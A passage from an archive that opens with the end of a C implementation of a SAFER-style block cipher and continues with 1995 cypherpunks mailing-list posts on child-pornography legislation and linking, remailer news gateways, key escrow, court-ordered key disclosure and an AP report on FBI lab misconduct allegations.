  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter left half of key as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  ka[0]=(unsigned char)i1;
  ka[1]=(unsigned char)i2;
  ka[2]=(unsigned char)i3;
  ka[3]=(unsigned char)i4;
  ka[4]=(unsigned char)i5;
  ka[5]=(unsigned char)i6;
  ka[6]=(unsigned char)i7;
  ka[7]=(unsigned char)i8;

  printf("Enter right half of key as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  kb[0]=(unsigned char)i1;
  kb[1]=(unsigned char)i2;
  kb[2]=(unsigned char)i3;
  kb[3]=(unsigned char)i4;
  kb[4]=(unsigned char)i5;
  kb[5]=(unsigned char)i6;
  kb[6]=(unsigned char)i7;
  kb[7]=(unsigned char)i8;
}

key_schedule()
{
/* append a "parity byte" to the key k1 */

  ka[8]=ka[0]^ka[1]^ka[2]^ka[3]^ka[4]^ka[5]^ka[6]^ka[7];
  kb[8]=kb[0]^kb[1]^kb[2]^kb[3]^kb[4]^kb[5]^kb[6]^kb[7];

/* derive keys k1, k2, ... k2r+1 from input key ka, kb */

  for(j=0;j<8;j++)
    k[0][j]=kb[j];

/* each byte of the key ka is right rotated by 3 */

  for(j=0;j<9;j++)
    ka[j]=(ka[j]>>3) + (ka[j]<<5);

  for(i=1;i<=r;i++)
  {
  /* each byte of the keys ka and kb is left rotated by 6 */

    for(j=0;j<=8;j++)
    {
      ka[j]=(ka[j]<<6) + (ka[j]>>2);
      kb[j]=(kb[j]<<6) + (kb[j]>>2);
    }

  /* the key bias is added to give keys k2i-1 and k2i */

    for(j=1;j<=8;j++)
    {
      k[2*i-1][j-1]=ka[(j+2*i-2) % 9]+exptab[exptab[18*i+j]];
      k[2*i][j-1]=kb[(j+2*i-1) % 9]+exptab[exptab[18*i+9+j]];
    }
  }
}

encrypt()
{
  for(i=1;i<=r;i++)
  {
  /* Key 2i-1 is mixed bit and byte added  to the round input */

    a1=a1 ^ k[2*i-2][0];
    a2=a2 + k[2*i-2][1];
    a3=a3 + k[2*i-2][2];
    a4=a4 ^ k[2*i-2][3];
    a5=a5 ^ k[2*i-2][4];
    a6=a6 + k[2*i-2][5];
    a7=a7 + k[2*i-2][6];
    a8=a8 ^ k[2*i-2][7];

  /* The result now passes through the nonlinear layer */

    b1=exptab[a1];
    b2=logtab[a2];
    b3=logtab[a3];
    b4=exptab[a4];
    b5=exptab[a5];
    b6=logtab[a6];
    b7=logtab[a7];
    b8=exptab[a8];

  /* Key 2i is now mixed byte and bit added to the result */

    b1=b1 + k[2*i-1][0];
    b2=b2 ^ k[2*i-1][1];
    b3=b3 ^ k[2*i-1][2];
    b4=b4 + k[2*i-1][3];
    b5=b5 + k[2*i-1][4];
    b6=b6 ^ k[2*i-1][5];
    b7=b7 ^ k[2*i-1][6];
    b8=b8 + k[2*i-1][7];

  /* The result now enters the linear layer */

    mat1(b1,b2,&a1,&a2);
    mat1(b3,b4,&a3,&a4);
    mat1(b5,b6,&a5,&a6);
    mat1(b7,b8,&a7,&a8);

    mat1(a1,a3,&b1,&b2);
    mat1(a5,a7,&b3,&b4);
    mat1(a2,a4,&b5,&b6);
    mat1(a6,a8,&b7,&b8);

    mat1(b1,b3,&a1,&a2);
    mat1(b5,b7,&a3,&a4);
    mat1(b2,b4,&a5,&a6);
    mat1(b6,b8,&a7,&a8);

  /* The round is now completed! */

    printf("after round %d   %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   (int)i,a1,a2,a3,a4,a5,a6,a7,a8);
  }

/* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */

  a1=a1 ^ k[2*r][0];
  a2=a2 + k[2*r][1];
  a3=a3 + k[2*r][2];
  a4=a4 ^ k[2*r][3];
  a5=a5 ^ k[2*r][4];
  a6=a6 + k[2*r][5];
  a7=a7 + k[2*r][6];
  a8=a8 ^ k[2*r][7];
}

main()
{
  init_tables();
  for(;;)
  {
    set_rounds();
    get_plaintext();
    get_key();

    printf("PLAINTEXT is    %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
    printf("KEY Ka IS       %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   ka[0],ka[1],ka[2],ka[3],ka[4],ka[5],ka[6],ka[7]);
    printf("KEY Kb IS       %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   kb[0],kb[1],kb[2],kb[3],kb[4],kb[5],kb[6],kb[7]);

    key_schedule();
    encrypt();

    printf("CRYPTOGRAM IS   %3d %3d %3d %3d %3d %3d %3d %3d\n\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
  }
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Sep 95 10:17:47 PDT
To: <cypherpunks@toad.com>
Subject: Child Porn, Morphing, and Pointers
Message-ID: <ac7db05202021004bc61@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:40 PM 9/14/95, Rev. Ben wrote:

>> The bill would expand the definition of child pornography
>> to include any photograph, film, videotape or computer
>> image produced by any means, including electronically by
>> computer, if it depicts or appears to depict a minor
>> engaging in sexually explicit conduct.
>
>If I'm reading this correctly, if I Photoshop a kids face onto the body
>of the latest Playboy centerfold, I'm in violation of this proposed law?

I believe there have already been prosecutions along these lines. For
example, do you think a _comic book_ with child porn themes ("explicit"
art, situations) would not be prosecuted as child porn?

I strongly suspect that a _painting_ of a 7-year-old girl engaged in a sex
act would result in a prosecution.

Keith Henson, amongst others, has long suggested that a good test case will
be the _morphing_ of legal images to make them look like child porn.

This is not a legal list--for that there are several other fora/forums--but
it is clear that the child porn laws are not necessarily aimed at the
protection of specific minor children from "exploitation," as the laws
apply to porn imported from countries where the age of consent is lower,
apply to images of dead children (who can no longer be exploited by the
images), and to "created" images of children (morphing, cut-and-paste,
paintings, etc.)

The laws are clearly aimed at both extinguishing the _market_ for child
pornography and the _thoughts_ themselves, not at the protection of
specific children. (Advocates will argue that by suppressing the production
of child porn markets, future children may be protected....)

The main Cypherpunks theme I can find here is this: anonymous remailers and
Web proxies will be used to access offshore (or indeterminately located)
sites. The Feds will likely come down very hard on any remailers or proxies
found to be "trafficking" in such materials.

I'm going to post to this list a recent post I made to the Cyberia list
about whether pointers are the same as transfers.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Sep 95 10:24:28 PDT
To: cypherpunks@toad.com
Subject: Linking = Showing = Transferring?
Message-ID: <ac7db410030210049d7f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I posted this to the Cyberia mailing list, but think it has some
implications for Cypherpunks as well. And, I'm responding to Duncan
Frissell, one of our own.

(I don't advise subscribing to Cyberia unless legal issues interest you and
you have the time for another high-volume mailing list. Still, some bright
folks there--as well as some dullards. David Friedman just joined the list.
To subscribe, send a message to listserv@listserv.cc.wm.edu with the
message body of subscribe cyberia-l YourNameHere.)

>
>To:cyberia-l@warthog.cc.wm.edu
>From:tcmay@got.net (Timothy C. May)
>Subject:Linking = Showing = Transferring?
>
>
>As good a chance as any to extend my "showing = telling" point...
>
>At 9:32 AM 9/14/95, Duncan Frissell wrote:
>
>>And my favorite: "What if the student merely includes *links* to
>>the above on his web page?"  Of course racist images/messages are
>>always and everywhere as legal as church on a Sunday although they
>>may carry civil liability in limited cases -- not a problem for
>>judgment-proof students.
>...
>>"Is the URL the page itself? --- Unanswered philosophical questions
>>of the wired age."
>
>_Linking_ is effectively _showing_, given the point-and-click mechanics of
>hypertext. This is a situation anticipated by authors (e.g. Ted Nelson),
>but is now coming to the fore.
>
>Granted, providing a link is not the same as actually _including_ the
>material the link points to, but it is very, very close. Arguably, the
>same.
>
>(Example: I create a home page with links to many images that are child
>pornography by U.S. standards. The images themselves may be initially
>stored in URLs that are in countries with different standards for consent,
>e.g., Denmark or Thailand. Have I violated the child porn laws? Arguably,
>I am "making available" these materials, but all I have done is to provide
>the _pointers_. The readers of my home page are the actual downloaders,
>not me.)
>
>I can imagine rebuttals to this position, arguing that an author who
>includes URLs to other places is doing nothing different than an author
>who includes footnoted references to other works (and surely we all agree
>that footnotes are not copyright infringements of any sort).
>
>However, look at how the Web is being used. Home pages that have
>compilations of interesting things are effectively the works! It is as if
>the original materials are being stored on those home pages themselves!
>
>There is _technological_ and _propertarian_ fix to this: controlled or
>paid access to the URLs under question. The "gatekeeper" function shifts
>to the actual material under question.
>
>But there are many new questions.
>
>And Duncan's specific point remains:
>
>-- is it a violation of pornography laws (perhaps campus rules) to have a
>home page with links to URLs containing pornographic images?
>
>-- is it a violation of _child pornography_ laws to have a home page with
>links to URLs containing child pornography images? (The URLs could be
>offshore, perhaps in jurisdictions where the age of consent is much
>different than in the U.S., e.g., Denmark or Thailand.)
>
>-- is it a violation of national security laws to have a home page with
>links to URLs containing national defense secrets? (The URLs could be
>offshore.)
>
>-- is it a violation of copyright/patent laws to have home pages with
>pointers to protected material? (Songs, written works, images, inventions,
>etc.)
>
>And so on....
>
>--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Thu, 14 Sep 95 07:28:31 PDT
To: cypherpunks@toad.com
Subject: Crimestoppers anon tip mailbox
Message-ID: <199509141428.KAA10931@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Frank Stuart <fstuart@vetmed.auburn.edu> writes:

> Now that you mention it, it seems to me that completely anonymous tipsters
> with the ability to receive ecash rewards would likely be a bigger boon to
> law enforcement types than would easily tappable communications lines.  
> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> use through the remailers)?

I might be.

>  You could set up a web-page with instructions
>  and a list of crimes for which there are rewards.  Perhaps some civic
>  organizations would be willing to donate money for tips leading to arrests
>  and convictions of any crimes.

Excellent idea.  Then it could be brought to the attention of a candidate
or two that have net.crime on their agendas.

>  Even if it doesn't catch any bad guys, it'd be
>  great PR for strong crypto, anonymity, ecash and whoever runs it.
                                                    ^^^^^^^^^^^^^^^

Well, I don't know about the last part - it seems to me that opinions
would be mixed.

The only thing that I'm not sure of is the use of ecash - mostly
because I haven't really been keeping track of the state of the
art.  Could some people who are better informed on the subject
discuss whether this is a feasible way to use it?

I wasn't actually thinking of rewards, mostly because you'd have to
arrange some sort of reply block from the anonymous tip mailbox.
Most people (even remailer users) don't know how or don't wish to
use these, so I don't know if that part would really fly.


David C. Lambert
dcl@panix.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFg8D6pplsfgM88VAQG6lQP+OpKrDF73T8zupGfco0VREUa98wLYR7VX
Jw2OyUHYML28VQNxwikZNTwBObotEihVo6uH9xRKzhBnpzqol1D/ZAj+1z24x2EK
byqhSp4PJEiKmzqW0chWCeIhX6ND45E2vSweBB6/OPotlZw9C7ZfnM+i0cfII3gb
Np+Dec/mLHU=
=M+KT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@nntp.com>
Date: Thu, 14 Sep 95 07:31:06 PDT
To: Remailer-Operators@c2.org
Subject: Re: Mixmaster posting poll
Message-ID: <199509141429.KAA23068@nntp.com>
MIME-Version: 1.0
Content-Type: text/plain


> I think that I am not being clear enough about what I want to do.

Ah, now I understand -- thanks for the clarification.

Let me waste a bit of time on some general news/mail issues.  The two
formats are very similar, but not identical.  This is generally a good
thing.  For example, it's easy to write a single user interface that handles
both.  (Many people like having killfiles on their email, for example.)

However, when you start to gateway between the two, the differences become
more important.  For example, suppose an article has To, Newsgroups, and Cc
headers.  What should happen?  Some news user-agents (used to?) email as
well as post when given a news article with those headers.  And what happens
when an article is then gatewayed back out to email, and care isn't taken to
strip those headers off?  (Rhetorical question; I don't know.)  I think
this is of particular concern to this community.  Imagine a mail->news remailer
that gatewayed messages by connection to UUNET's accept-from-anyone server
and posted them to alt.blacknet.  Interested parties might then get a full
feed and locally gateway alt.blacknet into a mailing list.  So this kind of
multi-time gatewaying, if not common now, could (and should?) be soon.

I guess that's a long way of saying "be careful." :)

The advantage of using "news.group@gateway.host" is that it might
avoid these confusions since the Newsgroup header appears out-of-band.
However setting up gateways like this is often harder, requiring
special prefixes (viz., usenet.news.group@gate.host is/was common)
hundreds (thousands) of aliases, or the ability to set up special
mailer config (typically sendmail.cf on the internet these days)
that recognize only the top-level hierarchies (of which there are
hundreds, changing weekly).  There is also the problem of making sure
that the mail newsgroup list is kept in sync with the local host's
newsgroup list.  An even bigger problem is that cross-postings are
essentially impossible (you get multiple copies); this can be annoying
if you want to cross-post to a group that the gateway host doesn't receive.
A workable trick is to post to control,alt.blacknet -- everyone "gets"
control but only those that care will see the article where it should
really go.

If you use something like mail2news@gate.host, then the newsgroups are
in the Newsgroups header.  You have to be careful about To and Cc but
you don't have the problems mentioned above.

I think the header problem is more likely fixed/fixable, and therefore suggest
the second syntax.

If you do local gatewaying, you should really send your article into rnews
and not inews.  Inews will mess with headers, which is okay for users or
scripts that know they can be sloppy.  But not okay for gateways which
don't want .signature files appended, too-much-quoted-text counted, etc.
Feeding into rnews is not difficult -- you need merely ensure that your
message has these six headers:  Message-ID Newsgroups From Date Subject Path.
The other advantage of feeding into rnews is that rnews always spools if
the news processor is unavailable, while inews doesn't.

Another option is to provide a program that can connect to a specified
host and inject the gatewayed article directly using the NNTP protocol.
This is not hard; INN includes a program (feedone.c) that does it in
about 200 commented source lines.

INN is available from many places, including
	ftp://ftp.uu.net/networking/news/nntp/inn/inn1.4sec2.tar.Z
and my news/mail gateway software (newsgate) is available by sending
me email.

Hope this helps.
	/r$
>
> At 8:35 AM 9/13/95, Rich Salz wrote:
> >>       If the form alt.usenet.group@remailer.com was used, wouldn't the
> >> system running the remailer have to have an alias defined for each and
> >> every newsgroup that it plans on handling?
> >
> >No.  Sites running sendmail, for example, could set up rules that
> >just knew the top-level hierarchies and fed those into a special
> >"mailer" that gatewayed them.
> >
> >My opinion is that making any names well-known is a bad idea, and
> >that attaching special semantics to "mail2news@xxx" is a real bad
> >idea.  Instead, just send the message to the specified recipient
> >and let do whatever magic needs to be done.
> >
> >If mixmaster wants to function as a mail/news gateway, it should
> >do something special when it sees the Newsgroups header -- process
> >the message and feed it into rnews, presumably.
> >
> >I guess, but not yet having read the code do not know, that this is
> >cleaner and more easily extensible (or removable).
> >        /r$
>
> ----------------------------------------------------------
> Lance Cottrell   loki@obscura.com
> PGP 2.6 key available by finger or server.
> Mixmaster, the next generation remailer, is now available!
> http://obscura.com/~loki/Welcome.html or FTP to obscura.com
>
> "Love is a snowmobile racing across the tundra.  Suddenly
> it flips over, pinning you underneath.  At night the ice
> weasels come."
>                         --Nietzsche
> ----------------------------------------------------------
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 14 Sep 95 08:35:41 PDT
To: mark@unicorn.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509141535.KAA05557@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
>> use through the remailers)?  You could set up a web-page with instructions
>> and a list of crimes for which there are rewards.
>
>Someone already tried that. The cops got a copy of the WWW logs and 
>started investigating everyone who'd looked at the WWW page... So at the 
>least you'd need a bunch of anonymous WWW proxies as well.

Yuck.  Well, if this is going to be a problem, you could distribute a
periodic FAQ via Usenet instead.

>There's also the problem that the current ecash systems do not provide 
>payee anonymity, so if you pay informers with ecash they can be traced if 
>the bank and payer collude.

That's a real problem and underscores the need for better ecash.  :)


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Thu, 14 Sep 95 07:41:14 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: WAS_tem
In-Reply-To: <199509141313.JAA12828@pipe4.nyc.pipeline.com>
Message-ID: <Pine.A32.3.91.950914103818.18450A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>    The New York Times, September 14, 1995, pp. A1, B14.
> 
>    Use of Computer Network For Child Sex Sets Off Raids

[snip]

>    Lawmakers have debated whether to restrict the use of 
> computer networks. Today, a bill making it illegal to use 
> computers to produce child pornography was introduced by 
> Senator Orrin G. Hatch, the Utah Republican who heads the 
> Judiciary Committee. 
> 
> The bill would expand the definition of child pornography 
> to include any photograph, film, videotape or computer 
> image produced by any means, including electronically by 
> computer, if it depicts or appears to depict a minor 
> engaging in sexually explicit conduct. 

If I'm reading this correctly, if I Photoshop a kids face onto the body 
of the latest Playboy centerfold, I'm in violation of this proposed law?

Ben
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  
PGP encrypted mail welcomed--finger samman@cs.yale.edu for public key


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMFg+8L5ALmeTVXAJAQEJswL+KijGeD+NIxOEdGkusWl/l8kLpigd73r1
JxoOeo1Sv9jc8JEv89SQDt2xY5i9WhquARph/+N2d7m2FR1DvRnLlHtuvjsV7hjS
mOwurpzx6wHfmJnivojJUqwfTrqxT5gG
=bUJU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Wed, 13 Sep 95 17:46:21 PDT
To: cypherpunks@toad.com
Subject: re: CYPHERPUNK considered harmful.
Message-ID: <9509140046.AA07859@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


P. Trei writes
>                  "CYPHERPUNK" considered harmful

>     I would like to propose that we, the 'cypherpunks', are making a
> strategic error, which will make it far more difficult to achieve the
> goal we share.
>      Our error lies in our approach to encouraging the widespread use of
> crypto. It is an error of hubris - overweening pride.

>      We too often think of ourselves as an elite - smarter and better in
> various ways to our non-cpunk neighbours. We refer to these others as
> 'Joe Sixpack" and other such derogatary terms. 

I think thsi is confusing two separate things. The need to publicise 
and encourage the use of crypto is important to many of us and lots of us
do this in various ways (web pages, magazine articles etc). The other aspect
of the cypherpunks is writing code, discussing protocols etc, some of which
is fairly arcane stuff and is by necessity the interest of an "elite" (as you
put it). I think the success of this list lies in the mixture.

>      I suggest that we drop the term 'cypherpunk' - it has the wrong
> connotations to get our ideas into the mainstream. I don't have a 
> perfect replacement yet:

I'll come clean and say that
initially the term "cypherpunks" made me cringe (and still does, maybe 'cos
I'm a brit ;-) ;-) but I certainly remembered it and it stuck in my mind enough
to get me interested in this stuff in the first place. In short, don't ditch
the name because if nothing else it *is* memorable, much more so that some more
comventional tag.

However, you do make some bloody good points about not alienating more
conservative people by coming over all crypto-anarchist (or whatever your 
particular bent is) when encouraging/publicising the use of crypto. 
The "why use crypto" questions and answers was a good example of how to
appeal to a more conservative viewpoint. When trying to find out about
crypto intially on the WWW I was rather overwhelmed by the number of political 
rants and a bit underwhelmed by the lack of solid info. This situation has 
improved a lot in the last 2 years but still needs work IMHO. 

[An aside to Web page maintainers...
<whinge>
Another thing to consider (for Web sites in particular) is that people 
from _all over the world_ will be reading it. If your site is a fairly 
central one, bear in mind that a lot of rants about congress trampling all over
the Nth amendment mean bugger all to a lot of us furriners, and come over
as a bit parochial. I'm not saying a local perspective is a bad thing, just
that it shouldn't be the only thing.
</whinge> ]

my 2c worth

Sherry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Thu, 14 Sep 95 07:48:21 PDT
Subject: Re: Scientology tries to break PGP - and
Message-ID: <9509141448.AA18318@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text/plain


This area of court ordered key disclosure is troubling.

I assume that failure to do so would be punished by
"contempt of court" much like a reporter that refuses
to reveal his information sources. (Jail or Fine until
the person complies with the order).

If you have PGP encrypted messages on your disk which
are encrypted to other people.  Is this a libality ?

Normally, you have no way to decrypt this data.

After looking at a PGP 'Hack' which allows the message
to be encrypted with a session key different from the
session key encrypted in the RSA header using someones
public key.  Your data could thus be encrypted in a PGP
message to someone without using the session key specified
in that RSA header.

This someone else may or may not exist.  You may have
created a key pair and discarded the secret key.
It would then seem that you could be found in "Contempt of
Court" because you could not come forward with a private
key belonging to someone other than yourself.

-tom








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 14 Sep 95 08:29:58 PDT
To: trei@process.com
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <199509132016.NAA02103@comsec.com>
Message-ID: <9509141511.AA05860@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: "Peter Trei" <trei@process.com>
>Date:          Wed, 13 Sep 1995 10:37:46 -6

>--------------------------------------------------------------
>
>	Towards this goal, I have written a short Q&A that could be
>used as a model when discussing cryptography with non-cypherpunks.


>Q: Aren't LEAs worried that strong encryption will make it more
>difficult for them to catch crooks?

Yes, some are -- especially at higher levels.  LEAs in the field (by my
informal survey) are not.  They're worried instead about manpower and normal
tools (e.g., computers back at the station, radios, ...).

Meanwhile, there is an advantage for LEAs when criminals have, for example,
encrypting phones.  A phone itself gives the person using it a sense of
privacy.  [This is probably a side effect of the psychological cues which
result from using a handset.  If you pull a handset away from your ear or
mouth very far, you can't converse.  Someone standing in the same room as
you probably can not hear the words you hear in your ear.  If the handset
were another person, this behavior would be called "whispering" --
something done to achieve privacy.]

An encrypting phone (or e-mail for that matter) gives the impression (and,
to some extent, reality) of extra privacy.

When there is a perception of privacy, the people conversing are more
likely to reveal things which they don't want overheard.  If these people
are ciminals, those things might be used as evidence against them.

The advantage for LEAs comes from the fact that the person at the other end
of the line might well be an LEA in disguise.  This is especially true on
the Internet (or on AOL, to cite a recent case), where the other person may
well be someone you have never met and therefore haven't checked out to
verify level of criminality.

>Q: What's this 'key escrow' thing? 
>
>A: Some government agencies have been trying to figure out methods which
>simultaneously permit US citizens to use strong cryptography against
>criminal eavesdroppers, while retaining the ease with which LEAs can
>currently tap your calls. The schemes generally involve something
>mistitled 'key escrow', in which copies of cryptographic keys would be
>stored at sites accessible by LEAs.

'key escrow' is a code word for government access to the unencrypted
message.  It is a persistent theme, dating back to the NSA's CCEP in about
1987.  'key escrow' is also the name of a technique by which the most
recent example of this access, Clipper/Capstone, achieved that government
access.

	( see http://www.clark.net/pub/cme/html/no-ke.html#etymology )

>Q: Why do you object to it?
>
>A: This is a bit as if your local police department ordered you to send
>them copies of all of your house, car, and office keys, so that they
>could enter whenever they felt it warranted, without your knowledge.
>
>Even assuming no keys will be leaked to criminals from such a valuable
>archive, it's an incredible boondoggle. The inital cost is tens of
>millions of dollars per year, by the most conservative government
>estimates. In reality, it's likely to be hundreds of millions a year,
>all to enable LEAs to investigate a type of crime which does not yet
>occur, and may never occur.

My preferred analogy so far (from http://www.clark.net/pub/cme/html/avss.html)
is:

	It is one thing to permit a police officer to look in an open
	window, see a criminal act in progress, start an investigation or
	make an arrest and use what he or she saw as evidence in an
	eventual trial of the perpetrators.  It is something entirely
	different to prohibit people from using curtains on the grounds
	that curtains might prevent a police officer from seeing a criminal
	act in progress.


>- ------------------------------------------------------
>Cute signature quotes are needed.

There was a great one last week at NIST:

	"Daddy ... if your data is your own property, does it become less
	your property after you encrypt it?"  [Speaker at the NIST
	workshop, September 6-7, 1995]

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 14 Sep 95 11:18:54 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster posting poll
Message-ID: <v0211010fac7e1ef7bc57@[198.68.110.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 9/13/95, Lance Cottrell wrote:
>
>I seem to recall that someone on this list wrote some mail2news software,
>Who was it and which standard did it follow (if either). Has anyone installed
>it? Is anyone else planning to install it. I will install a gateway when I
>get my T1 (in a couple of months).


Rich Salz wrote mail2news, based on some ugly stuff I wrote, ages ago.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Thu, 14 Sep 95 08:19:50 PDT
To: cypherpunks@toad.com
Subject: Feeb Slants Feeb Slur
Message-ID: <199509141519.LAA11102@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


FBI Probes Slant Allegations


Washington, September 14, 1995 (AP) -- The FBI says it
has reviewed more than 250 cases involving work done by
its crime lab after one of its agents alleged that his
colleagues slanted their testimony and fabricated
evidence to help prosecutors in high-profile cases.

"To date, no evidence tampering, evidence fabrication or
failure to report exculpatory evidence have been found,"
the FBI said in a statement Wednesday. "Any findings of
such misconduct will result in tough and swift action by
the FBI."

Special Agent Frederic Whitehurst, who made the
allegations and was interviewed Wednesday night on
ABC-TV's "Primetime Live" program, labeled the FBI
statement "garbage."

"I am obviously disagreeing with my superiors in this
matter. This report is garbage. ... It's garbage. I
personally know about the review of those 250 cases,"
Whitehurst said.

Whitehurst said he was under orders not to discuss
specific cases.

Defense lawyers want to call Whitehurst as a witness at
the O.J. Simpson murder trial in Los Angeles because he
has claimed that FBI agent Roger Martz, who gave
testimony damaging to Simpson, has slanted evidence in
testimony in other cases.

Asked if there had been evidence tampering at the FBI
lab, Whitehurst told ABC, "Yes, I believe there has been
evidence tampering."

He said he would testify at the Simpson trial "if the FBI
orders me to go."

Martz could not be reached for comment. There was no
answer at the office phones either Martz or Whitehurst
late Wednesday. Their home phone numbers could not be be
found.

The FBI said Whitehurst had, over the past several years,
raised "a variety of concerns about forensic protocols
and procedures employed in the FBI Laboratory," and that
the bureau or the inspector general's office of the
Justice Department, or both, had "vigorously
investigated" his concerns in all instances and were
continuing to do so.

The FBI said its laboratory examinations at trials are
"constantly subject to extraordinarily vigorous challenge
through cross-examination and the presentation of expert
testimony by defense witnesses."

Whitehurst told ABC he was speaking out because it was
his duty as an FBI agent.

"I swore to uphold the constitution of the United States,
and I swore to enforce the law. There was no caveat in
that swearing -- if I caught persons with badges I would
turn my back. I am an FBI agent. It's my duty," he said.

Whitehurst testified last month at the terrorism trial of
Sheik Omar Abdel-Rahman and nine other Muslims accused of
plotting to bomb the United Nations building and other
New York City landmarks that he was pressured to distort
findings about the 1993 World Trade Center bombing to
favor prosecutors.

Citing a series of internal memos sent by Whitehurst to
his FBI supervisors, ABC said the agent listed "one
example after another of what he calls perjury, fraud,
even the fabrication of evidence" in cases at the crime
lab going back at least five years.

One of the cases, ABC said, involved a 1991 Georgia
mail-bombing that killed a federal judge and a civil
rights lawyer. It was investigated by Louis Freeh, now
the FBI director. Walter LeRoy Moody Jr. was convicted in
the deaths.

ABC said Whitehurst alleges that two agents in that case,
one of whom was Martz, slanted evidence by testifying
about tests that weren't done and scientific conclusions
they couldn't support.

The FBI lab was used to analyze blood evidence involving
Simpson. Martz, a toxicologist, was called by the
defense, but was declared a hostile witness. He testified
that blood on a sock from Simpson's bedroom and from the
crime scene showed only vague signs of a preservative.
Simpson's lawyers say the blood was planted and the
presence of the preservative proved it.

While testifying in New York Aug. 14, Whitehurst said
Martz was among several FBI investigators who concluded
the World Trade Center bomb was urea-nitrate-based even
though it was impossible to prove that scientifically
because the substance is so common.

After Whitehurst complained to his superiors, he said,
reports about the bomb were corrected. He said they were
accurate when they were introduced at last year's World
Trade Center trial, which resulted in convictions for
followers of Abdel-Rahman.

At the terror conspiracy trial, Whitehurst said when he
first told his supervisor about the errors, the
supervisor "advised us that he would now have to
embarrass his chemistry toxicology unit chief and that we
were never, ever again to do something like that to him."

Later, Whitehurst said, the supervisor told him he had
been instructed by his bosses to have Whitehurst change
his reports, and debates within the FBI about the
evidence continued throughout the year.

Whitehurst, the FBI's main explosives-residue analyst at
the time of the bombing, said he has since been demoted
and assigned to analyze paint for forensic evidence.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
